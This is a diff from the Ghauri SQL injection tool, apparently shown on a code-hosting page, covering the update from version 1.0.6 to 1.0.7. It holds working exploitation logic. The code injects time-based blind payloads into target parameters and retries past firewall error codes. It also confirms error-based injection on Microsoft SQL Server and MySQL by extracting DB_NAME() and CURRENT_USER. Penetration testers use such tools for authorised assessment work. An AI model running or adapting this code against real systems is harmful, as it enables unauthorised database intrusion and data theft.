     988 + _payload = payloads[index_of_payload]
     989 + string = _payload.string
     990 + expression = string.replace("[SLEEPTIME]", "%s" % (sleep_time))
     991 + decoded_expression = urldecode(expression)
     992 + logger.payload(f"{decoded_expression}")
     993 + try:
     994 + attack = inject_expression(
    1083 995   url=url,
    1084 996   data=data,
    1085  - headers=headers,
    1086  - injection_type=injection_type,
    1087 997   proxy=proxy,
    1088  - is_multipart=is_multipart,
    1089  - timeout=timeout,
    1090 998   delay=delay,
    1091 999   timesec=timesec,
    1092  - is_read_timedout=True,
    1093  - vector=f"{_payload.prefix}{entry.vector}{_payload.suffix}",
     1000 + timeout=timeout,
     1001 + headers=headers,
     1002 + parameter=parameter,
     1003 + expression=expression,
     1004 + is_multipart=is_multipart,
     1005 + injection_type=injection_type,
     1006 + )
     1007 + index_of_payload += 1
     1008 + retry_on_error = 0
     1009 + except KeyboardInterrupt:
     1010 + logger.warning("user aborted during detection phase")
     1011 + quest = logger.read_input(
     1012 + "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(q)uit] ",
     1013 + batch=False,
     1014 + user_input="S",
    1094 1015   )
    1095  - if not ok.vulnerable:
    1096  - logger.warning(
    1097  - "false positive payload detected with read timeout continue testing.."
     1016 + if quest and quest == "n":
     1017 + # later on will handle this nicely..
     1018 + return "next parameter"
     1019 + if quest and quest == "q":
     1020 + logger.error("user quit")
     1021 + logger.end("ending")
     1022 + exit(0)
     1023 + if quest and quest == "e":
     1024 + end_detection_phase = True
     1025 + if quest and quest == "s":
     1026 + break
     1027 + except ConnectionAbortedError as e:
     1028 + logger.critical(
     1029 + f"connection attempt to the target URL was aborted by the peer, Ghauri is going to retry"
     1030 + )
     1031 + retry_on_error += 1
     1032 + except ConnectionRefusedError as e:
     1033 + logger.critical(
     1034 + f"connection attempt to the target URL was refused by the peer. Ghauri is going to retry"
     1035 + )
     1036 + retry_on_error += 1
     1037 + except ConnectionResetError as e:
     1038 + logger.critical(
     1039 + f"connection attempt to the target URL was reset by the peer. Ghauri is going to retry"
     1040 + )
     1041 + retry_on_error += 1
     1042 + except Exception as error:
     1043 + logger.critical(
     1044 + f"error {error}, during detection phase. Ghauri is going to retry"
     1045 + )
     1046 + retry_on_error += 1
     1047 + response_time = attack.response_time
     1048 + if response_time < sleep_time and end_detection_phase:
     1049 + return None
     1050 + requests_counter += 1
     1051 + with_status_code_msg = ""
     1052 + with_status_code = attack.status_code
     1053 + if attack.status_code != base.status_code:
     1054 + is_different_status_code_injectable = True
     1055 + if with_status_code == 4001:
     1056 + with_status_code_msg = (
     1057 + f" (with error ReadTimeout on --timeout={timeout})"
    1098 1058   )
    1099  - continue
    1100  - logger.notice(message)
    1101  - _url = attack.request_url if injection_type == "GET" else attack.url
    1102  - _temp = Response(
    1103  - url=_url,
    1104  - data=attack.data,
    1105  - path=attack.path,
    1106  - title=entry.title,
    1107  - param=parameter,
    1108  - payload=expression,
    1109  - base=base._asdict(),
    1110  - prefix=_payload.prefix,
    1111  - suffix=_payload.suffix,
    1112  - vector=entry.vector,
    1113  - attacks=attack._asdict(),
    1114  - injection_type=injection_type,
    1115  - sleep_time=sleep_time,
    1116  - response_time=response_time,
    1117  - injected=is_injected,
    1118  - prepared_vector=f"{_payload.prefix}{entry.vector}{_payload.suffix}",
    1119  - number_of_requests=requests_counter,
    1120  - backend=backend,
    1121  - payload_type="time-based blind",
    1122  - payload_raw=_payload,
    1123  - with_status_code=with_status_code,
    1124  - is_different_status_code_injectable=is_different_status_code_injectable,
     1059 + else:
     1060 + with_status_code_msg = f" (with --code={with_status_code})"
     1061 + if attack.status_code in [403, 406] and code and code not in [403, 406]:
     1062 + logger.critical(
     1063 + f"{attack.error_msg} HTTP error code detected. ghauri is going to retry."
     1064 + )
     1065 + time.sleep(0.5)
     1066 + error_msg = attack.error_msg
     1067 + http_firewall_code_counter += 1
     1068 + continue
     1069 + logger.debug(
     1070 + f"sleep time: {sleep_time}, response time: {response_time}"
    1125 1071   )
    1126  - return _temp
     1072 + if response_time >= sleep_time:
     1073 + is_injected = True
     1074 + _it = injection_type
     1075 + if param_key == "#1*":
     1076 + _it = "URI"
     1077 + if is_multipart:
     1078 + message = f"(custom) {injection_type} parameter '{mc}MULTIPART {param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
     1079 + elif is_json:
     1080 + message = f"(custom) {injection_type} parameter '{mc}JSON {param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
     1081 + else:
     1082 + message = f"{_it} parameter '{mc}{param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
     1083 + if with_status_code_msg and "ReadTimeout" in with_status_code_msg:
     1084 + logger.warning(
     1085 + "in case of read timeout performing further tests to confirm if the detected payload is working.."
     1086 + )
     1087 + ok = confirm_timebased_sqli(
     1088 + base,
     1089 + parameter,
     1090 + _payload,
     1091 + sleep_time,
     1092 + response_time,
     1093 + url=url,
     1094 + data=data,
     1095 + headers=headers,
     1096 + injection_type=injection_type,
     1097 + proxy=proxy,
     1098 + is_multipart=is_multipart,
     1099 + timeout=timeout,
     1100 + delay=delay,
     1101 + timesec=timesec,
     1102 + is_read_timedout=True,
     1103 + vector=f"{_payload.prefix}{entry.vector}{_payload.suffix}",
     1104 + )
     1105 + if not ok.vulnerable:
     1106 + logger.warning(
     1107 + "false positive payload detected with read timeout continue testing.."
     1108 + )
     1109 + continue
     1110 + logger.notice(message)
     1111 + _url = attack.request_url if injection_type == "GET" else attack.url
     1112 + _temp = Response(
     1113 + url=_url,
     1114 + data=attack.data,
     1115 + path=attack.path,
     1116 + title=entry.title,
     1117 + param=parameter,
     1118 + payload=expression,
     1119 + base=base._asdict(),
     1120 + prefix=_payload.prefix,
     1121 + suffix=_payload.suffix,
     1122 + vector=entry.vector,
     1123 + attacks=attack._asdict(),
     1124 + injection_type=injection_type,
     1125 + sleep_time=sleep_time,
     1126 + response_time=response_time,
     1127 + injected=is_injected,
     1128 + prepared_vector=f"{_payload.prefix}{entry.vector}{_payload.suffix}",
     1129 + number_of_requests=requests_counter,
     1130 + backend=backend,
     1131 + payload_type="time-based blind",
     1132 + payload_raw=_payload,
     1133 + with_status_code=with_status_code,
     1134 + is_different_status_code_injectable=is_different_status_code_injectable,
     1135 + )
     1136 + return _temp
    1127 1137   return None
    1128 1138   
    1129 1139   
    skipped 189 lines
    1319 1329   "confirmating if target is actually exploiable or not.."
    1320 1330   )
    1321 1331   _pv = f"{_payload.prefix}{entry.vector}{_payload.suffix}"
    1322  - _expression = _pv.replace("[INFERENCE]", "(SELECT%20DB_NAME())")
    1323  - logger.payload(f"{urldecode(_expression)}")
    1324  - try:
    1325  - _attack = inject_expression(
    1326  - url=url,
    1327  - data=data,
    1328  - proxy=proxy,
    1329  - delay=delay,
    1330  - timesec=timesec,
    1331  - timeout=timeout,
    1332  - headers=headers,
    1333  - parameter=parameter,
    1334  - expression=_expression,
    1335  - is_multipart=is_multipart,
    1336  - injection_type=injection_type,
    1337  - )
    1338  - retval_confirm = search_regex(
    1339  - pattern=(
    1340  - r"(?isx)(?:(?:r0oth3x49|START)~(?P<error_based_response>.*?)\~END)",
    1341  - REGEX_GENERIC,
    1342  - REGEX_MSSQL_STRING,
    1343  - ),
    1344  - string=_attack.text,
    1345  - group="error_based_response",
    1346  - default=None,
    1347  - )
    1348  - if retval_confirm and retval_confirm != "<blank_value>":
    1349  - is_string = True
    1350  - logger.debug(
    1351  - f"reflective value found in response, filtering out"
     1332 + pl = (
     1333 + "(SELECT DB_NAME())"
     1334 + if backend == "Microsoft SQL Server"
     1335 + else None
     1336 + )
     1337 + if not pl:
     1338 + pl = "CURRENT_USER" if backend == "MySQL" else None
     1339 + if pl:
     1340 + _expression = _pv.replace("[INFERENCE]", pl)
     1341 + logger.payload(f"{urldecode(_expression)}")
     1342 + try:
     1343 + _attack = inject_expression(
     1344 + url=url,
     1345 + data=data,
     1346 + proxy=proxy,
     1347 + delay=delay,
     1348 + timesec=timesec,
     1349 + timeout=timeout,
     1350 + headers=headers,
     1351 + parameter=parameter,
     1352 + expression=_expression,
     1353 + is_multipart=is_multipart,
     1354 + injection_type=injection_type,
    1352 1355   )
    1353  - logger.debug(f"retrieved: '{retval_confirm}'")
    1354  - else:
    1355  - logger.debug(
    1356  - "false positive payload detected, continue testing more.."
     1356 + retval_confirm = search_regex(
     1357 + pattern=(
     1358 + r"(?isx)(?:(?:r0oth3x49|START)~(?P<error_based_response>.*?)\~END)",
     1359 + REGEX_GENERIC,
     1360 + REGEX_MSSQL_STRING,
     1361 + ),
     1362 + string=_attack.text,
     1363 + group="error_based_response",
     1364 + default=None,
     1365 + )
     1366 + if retval_confirm and retval_confirm != "<blank_value>":
     1367 + is_string = True
     1368 + logger.debug(
     1369 + f"reflective value found in response, filtering out"
     1370 + )
     1371 + logger.debug(f"retrieved: '{retval_confirm}'")
     1372 + else:
     1373 + logger.debug(
     1374 + "false positive payload detected, continue testing more.."
     1375 + )
     1376 + continue
     1377 + except KeyboardInterrupt:
     1378 + logger.warning(
     1379 + "user aborted during string error-based 'Microsoft SQL Server' injection confirmation"
     1380 + )
     1381 + continue
     1382 + except Exception as error:
     1383 + logger.critical(
     1384 + f"error {error}, during string error-based 'Microsoft SQL Server' injection confirmation.."
    1357 1385   )
    1358 1386   continue
    1359  - except KeyboardInterrupt:
    1360  - logger.warning(
    1361  - "user aborted during string error-based 'Microsoft SQL Server' injection confirmation"
    1362  - )
    1363  - continue
    1364  - except Exception as error:
    1365  - logger.critical(
    1366  - f"error {error}, during string error-based 'Microsoft SQL Server' injection confirmation.."
    1367  - )
    1368  - continue
    1369 1387   _it = injection_type
    1370 1388   if param_key == "#1*":
    1371 1389   _it = "URI"
    skipped 202 lines
    1574 1592   string = "r0oth3x49"
    1575 1593   regex = r"(?is)(?:r0oth3x49)"
    1576 1594   if backend == "Microsoft SQL Server":
     1595 + if "string error-based" in title:
     1596 + to_str = is_string = True
     1597 + if is_string:
     1598 + string = "r0ot"
     1599 + regex = r"(?is)(?:r0ot)"
     1600 + else:
     1601 + to_char = not is_string
     1602 + if backend == "MySQL":
    1577 1603   if "string error-based" in title:
    1578 1604   to_str = is_string = True
    1579 1605   if is_string:
    skipped 667 lines
  • ■ ■ ■ ■
    setup.py
    skipped 4 lines
    5 5   
    6 6  setup(
    7 7   name="ghauri",
    8  - version="1.0.6",
     8 + version="1.0.7",
    9 9   description="An advanced SQL injection detection & exploitation tool.",
    10 10   classifiers=["Programming Language :: Python3"],
    11 11   author="Nasir Khan",
    skipped 28 lines
Please wait...
Page is in error, reload to recover